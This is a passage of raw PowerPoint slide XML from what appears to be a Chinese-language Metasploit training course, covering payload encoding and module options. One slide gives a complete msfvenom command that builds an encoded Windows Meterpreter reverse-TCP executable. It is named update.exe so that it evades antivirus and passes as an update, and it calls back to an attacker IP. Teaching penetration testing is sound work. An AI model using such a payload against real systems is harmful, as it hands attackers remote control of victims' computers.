                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>设置编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="1819153"/>
            <a:ext cx="11063043" cy="4909893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为了避免出现坏字符，或者规避目标主机中防火墙或杀毒软件的拦截，可以为攻击载荷设置编码，从而生成新的攻击载荷。其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>框架配套的攻击载荷生成器。其中，用于生成攻击载荷的语法格式如下所示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> –l encoders   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（支持的格式）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.77.131 LPORT=8080 -f exe --platform windows --arch x86 -e x86/shikata_ga_nai -i 10 &gt; /var/www/html/update.exe </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#ls /var/www/html    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>要一致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="C:\Users\Administrator\AppData\Roaming\Tencent\TIM\Temp\%W@GJ$ACOF(TYDYECOKVDY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6225" y="-274638"/>
            <a:ext cx="190500" cy="142875"/>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D2C83642-2FAF-01A5-F11D-83CF9D21BEAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7918506" y="5226784"/>
            <a:ext cx="7874000" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指定使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指定生成的文件格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指定系统架构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指定编码格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：指定编码次数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41996319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矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3FDC8C-7676-B135-72AE-F37EFC79B0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72C2052-D527-DB4E-DD5A-4DA75C8D5618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="469231" y="1306956"/>
            <a:ext cx="11093115" cy="29511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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>               所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>都有一些内置的参数，诸如远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>RPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、服务路径、用户名等。这些参数在漏洞利用之前需要进行配置，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Show Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>命令来显示具体的选项（名称，当前设置，是否必须设置，描述）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F75571EF-F694-DE30-E2A8-DB207A50A851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792480" y="4171745"/>
            <a:ext cx="10485120" cy="540148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击主机的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是目标主机的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SRVHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>监听主机的地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0755925-41BD-80F5-36C2-C185FEB52CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481996" y="5335600"/>
            <a:ext cx="7838161" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是线程数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提高扫描的速度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2622837165"/>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97876" y="1192214"/>
            <a:ext cx="10972800" cy="859326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
